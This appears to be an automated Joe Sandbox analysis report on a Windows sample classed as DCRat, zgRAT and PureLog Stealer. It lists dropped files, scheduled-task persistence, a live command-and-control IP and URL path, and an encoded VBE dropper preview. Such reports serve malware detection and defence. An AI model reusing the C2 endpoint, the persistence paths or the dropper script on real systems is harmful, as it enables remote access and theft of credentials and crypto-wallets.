PE32 41->78 dropped 80 8 other malicious files 41->80 dropped 114 Multi AV Scanner detection for dropped file 41->114 116 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 41->116 118 Found many strings related to Crypto-Wallets (likely being stolen) 41->118 120 2 other signatures 41->120 file17 signatures18

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    hz7DzW2Yop.exe68%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                                    hz7DzW2Yop.exe60%VirustotalBrowse
                                    hz7DzW2Yop.exe100%AviraVBS/Runner.VPG
                                    hz7DzW2Yop.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe100%AviraHEUR/AGEN.1323342
                                    C:\Recovery\SystemSettings.exe100%AviraHEUR/AGEN.1323342
                                    C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\cIDyHnkk.log100%AviraTR/Agent.jbwuj
                                    C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe100%AviraHEUR/AGEN.1323342
                                    C:\HyperWebbroker\serverBrokerperfMonitor.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\FyhuXVvF.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\Desktop\hnxxzxgb.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\LqKTzAAu.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe100%Joe Sandbox ML
                                    C:\Recovery\SystemSettings.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\IitSDvGY.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe100%Joe Sandbox ML
                                    C:\HyperWebbroker\serverBrokerperfMonitor.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\NVLRgsWM.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\HupKRiKa.log100%Joe Sandbox ML
                                    C:\HyperWebbroker\serverBrokerperfMonitor.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\SystemSettings.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\uAsLgsGzSk.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\CvvLBlqK.log25%ReversingLabs
                                    C:\Users\user\Desktop\FyhuXVvF.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\GvICsVKA.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\HupKRiKa.log5%ReversingLabs
                                    C:\Users\user\Desktop\IitSDvGY.log16%ReversingLabs
                                    C:\Users\user\Desktop\JwbtnRPV.log8%ReversingLabs
                                    C:\Users\user\Desktop\LqKTzAAu.log5%ReversingLabs
                                    C:\Users\user\Desktop\NVLRgsWM.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\QdcRcxPi.log8%ReversingLabs
                                    C:\Users\user\Desktop\cIDyHnkk.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\eIxzTFKJ.log25%ReversingLabs
                                    C:\Users\user\Desktop\hnxxzxgb.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\htcPaTVC.log16%ReversingLabs
                                    C:\Users\user\Desktop\maPwcuvP.log25%ReversingLabs
                                    C:\Users\user\Desktop\mlFoDzaq.log9%ReversingLabs
                                    C:\Users\user\Desktop\qTMMgMAe.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\qeoNTMEG.log17%ReversingLabs
                                    C:\Users\user\Desktop\vJjMMWBx.log9%ReversingLabs
                                    C:\Users\user\Desktop\vPOensqX.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\xRAMIbuT.log17%ReversingLabs
                                    C:\Users\user\Desktop\zHJVyCcw.log25%ReversingLabs
                                    C:\Users\user\Desktop\zIxCDFUn.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Windows\ShellExperiences\uAsLgsGzSk.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    https://go.microP0%Avira URL Cloudsafe
                                    http://www.t.com/pk0%Avira URL Cloudsafe
                                    http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php0%Avira URL Cloudsafe
                                    https://go.microPackageManagementp0%Avira URL Cloudsafe
                                    http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi0%Avira URL Cloudsafe
                                    http://89.23.100.2420%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    No contacted domains info

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.phptrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://go.microPpowershell.exe, 0000001C.00000002.2903142161.000001FE9F3F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000015.00000002.2768943723.000001C0AB4F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2748189605.000002586F235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2708101796.0000014FB13A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2554456806.0000020110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.t.com/pkpowershell.exe, 0000001A.00000002.2818911280.0000020171DE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000015.00000002.2057907934.000001C09B6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.microsoft.copowershell.exe, 0000001A.00000002.2801807600.0000020171A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.micpowershell.exe, 00000016.00000002.2966338477.00000258775C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApiuAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bruAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.mozilla.org/products/firefoxuAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://89.23.100.242uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://crl.mpowershell.exe, 0000001A.00000002.2818911280.0000020171E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://go.microPackageManagementppowershell.exe, 0000001C.00000002.2903142161.000001FE9F3F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000015.00000002.2057907934.000001C09B6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000015.00000002.2768943723.000001C0AB4F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2748189605.000002586F235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2708101796.0000014FB13A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2554456806.0000020110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.micft.cMicRosofpowershell.exe, 00000016.00000002.2966338477.00000258775C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/pscore68powershell.exe, 00000015.00000002.2057907934.000001C09B481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameserverBrokerperfMonitor.exe, 00000005.00000002.1900253467.000000000374E000.00000004.00000800.00020000.00000000.sdmp, serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2057907934.000001C09B481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87251000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            89.23.100.242
                                                                            		unknownRussian Federation
                                                                            		48687MAXITEL-ASRUtrue

                                                                            Private

                                                                            IP
                                                                            127.0.0.1

                                                                            General Information

                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1587336
                                                                            Start date and time:2025-01-10 07:56:08 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 9m 56s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:46
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:hz7DzW2Yop.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:46dcddd43cbaeae845c14e7306726ff2.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@37/346@0/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HCA Information:Failed
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SystemSettings.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                            • Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.109.210.53, 13.107.246.45
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target powershell.exe, PID 7996 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 8004 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 8020 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 8068 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            01:57:22API Interceptor151x Sleep call for process: powershell.exe modified
                                                                            01:57:30API Interceptor777931x Sleep call for process: uAsLgsGzSk.exe modified
                                                                            01:57:31API Interceptor2x Sleep call for process: svchost.exe modified
                                                                            06:57:21Task SchedulerRun new task: SystemSettings path: "C:\Recovery\SystemSettings.exe"
                                                                            06:57:21Task SchedulerRun new task: SystemSettingsS path: "C:\Recovery\SystemSettings.exe"
                                                                            06:57:21Task SchedulerRun new task: uAsLgsGzSk path: "C:\Recovery\uAsLgsGzSk.exe"
                                                                            06:57:21Task SchedulerRun new task: uAsLgsGzSku path: "C:\Recovery\uAsLgsGzSk.exe"

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            No context

                                                                            Domains

                                                                            No context

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            MAXITEL-ASRUFixer.exeGet hashmaliciousRedLine, SheetRatBrowse
                                                                            • 89.23.97.121
                                                                            Fixer.exeGet hashmaliciousRedLineBrowse
                                                                            • 89.23.97.121
                                                                            T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 89.23.100.42
                                                                            XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 89.23.96.180
                                                                            9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 89.23.96.180
                                                                            bPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                                            • 89.23.100.233
                                                                            itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                            • 89.23.100.233
                                                                            3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                            • 89.23.100.233
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                            • 89.23.100.42
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                            • 89.23.100.42

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Users\user\Desktop\CvvLBlqK.log7aHY4r6vXR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                FYKrlfQrxb.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    3XtEci4Mmo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                          Z90Z9bYzPa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            0J5DzstGPi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                Created / dropped Files

                                                                                                C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\hz7DzW2Yop.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):245
                                                                                                Entropy (8bit):5.884797037981624
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:GJ2wqK+NkLzWbHOurFnBaORbM5nCJO+/s1m8+Hs:GJ7MCzWLOuhBaORbQCJH0oXM
                                                                                                MD5:DEE780F62EACDC597601C402B88EA968
                                                                                                SHA1:9A4196726254BCCBDFF34B276F613515838817C2
                                                                                                SHA-256:DAF88159A6E3881975CE57838FD28E21CC2CD6EEB5893BFF93778055250EE510
                                                                                                SHA-512:FCE89CDF68F03AB969079538E7832A210D4DADB107A89B114AC04CE52F0E2F9B5059905AC93833907A973341FB4488A8A1171007903613A9D542B877385B7FFD
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                Preview:#@~^3AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zuHw.D..4(.W0+.zJV!U(9wN+FxC,Z;LE:I! djpCD0;VwhF6&*%4}%}6O,fx.{2Zqg}.R4mYrSPZ~~0mVdnyEUAAA==^#~@.

                                                                                                C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\hz7DzW2Yop.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):93
                                                                                                Entropy (8bit):4.852901781263745
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Q1AwI2TwUEiUzlzcGHaOZHmFyVATbMsb4aZn:XK4uGldAGAToO
                                                                                                MD5:DBB44638C3B379F5404B64129725B321
                                                                                                SHA1:6565668D25A295F6EFA600BB58ECA92A8DA929A6
                                                                                                SHA-256:3AAF5C7D8B99E1A6F2E02CA39B022C0E199C3AF2CD7BD437A21506D4824936C7
                                                                                                SHA-512:D98494A60E4028E3FA51008831DDFF8BCE8D56B830BB8A241FC6E9B36AB031B145B7339857FF876AA2B60AE35449147066B52E17DDF580B2E198948F1E004F1E
                                                                                                Malicious:false
                                                                                                Preview:%NZOk%%NdZmpBrqvSSov%..%VyqaSvUIqhryFO%"C:\HyperWebbroker/serverBrokerperfMonitor.exe"%CyxRv%

                                                                                                C:\HyperWebbroker\serverBrokerperfMonitor.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\hz7DzW2Yop.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....

                                                                                                C:\Program Files (x86)\Windows Defender\en-GB\de5836ef699499

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with very long lines (948), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):948
                                                                                                Entropy (8bit):5.901192535524882
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:sGnQECmVxv52DpXH6zCPw/CXmP3UtMiJsQchpRYoWhNMr:sGnvZfv0DpK8WMtMUgoNQ
                                                                                                MD5:3B0CA8246121DF5D14D3C47EC0153521
                                                                                                SHA1:414A4C9CAE11AEFD2948B143D51F3BB40A22A600
                                                                                                SHA-256:56BB4C312C83C900081CA642205284988F98560F036605ED4DCEDB9B6FB21871
                                                                                                SHA-512:48D62FB2218566E7E8A7DCA4879AE9868A4524D5CF533BC04C4165468AEDD0C2304129D6310874C1CE9E228F3C2B48A7457F76BE9667ADBE0D78483BC7018E02
                                                                                                Malicious:false
                                                                                                Preview:F3Tq1h8X89xdqbqzGd1jZq6d5fYvhzsSyDvNE9ZJc2Q5olQAJmeK1uhZ7zuWJM0IRepmqdvHErHhaAzUPYm4VhaDgWQPOCAPBHoJ6oTq1XFJn986AZGvk6xtElFUMg2Cr1gSWqXlE6C7cRagXTOy5PoEU5FVi9dVeDcvdqkUCfqo4zQxLi63RDGbNb8alCCFcqdYyoCrt4wZi9KeoRK9CkEb7AiCrJt9dlMNW28gfPJXQq3NQdwT2CC2lBayGA9jLx67x6IvTnexarKRHUvNWZHbjTlVbKafPkLdu5aUVA9OiOc40JqwPwMvqeYeUxUJN8izfrhL3b2Wa23V0reSdnQcXaxPh69iq0BjpmZJme2x30VxlDnnSCpksFcF3So7cTpj1UpORVp9ucjgE9neTVPoKa0jJTPU05VkKv6RXYV7WqzQg5A3oKoGDBZadFE8FVIzH9VTDWG49SRelkDNTVppROgJWfxRUX1Ah9Ihkq0SDtHvt5y3C0ouqci2cM7iiyjlaR6mbfnmfXmhHuZbr3PetHUEbPEXtStOKfUc8McgMBPT0Avrwf0ojF2T71KLaP3NnXXla7cebsRr1BOaeWlObEpEnAfGBRG6ICpcnKRzCWN0yKb5nurEoovisT7ZcVdKmUjzVvxTFvLF1yPdijdRjBSdQGtTM1Xq2DOdkmk16X92dqr3De122MkkCFjOBdGNYeMykv268mULCZAjZzQrAeyqcnbeDVzcQve9e3TRm43Q1YinF9zMNZN3pgV6UX3mw14R4AFfg8FFkiyDFyZDgnP1ikT8hX7OBRdAdQsE4TpOTHTHrR1f8zGJmDsUrH8IB0ETFxjyGUIN7AiaRLQQgbQLKTYahXXxVgNdD9C4rCZoq2LlfSDf0rmjj2IvZJQs6V2axEWRJWidBmeSHw5PU16n4n3L1ReivrrVAvya5vVeJJi7

                                                                                                C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
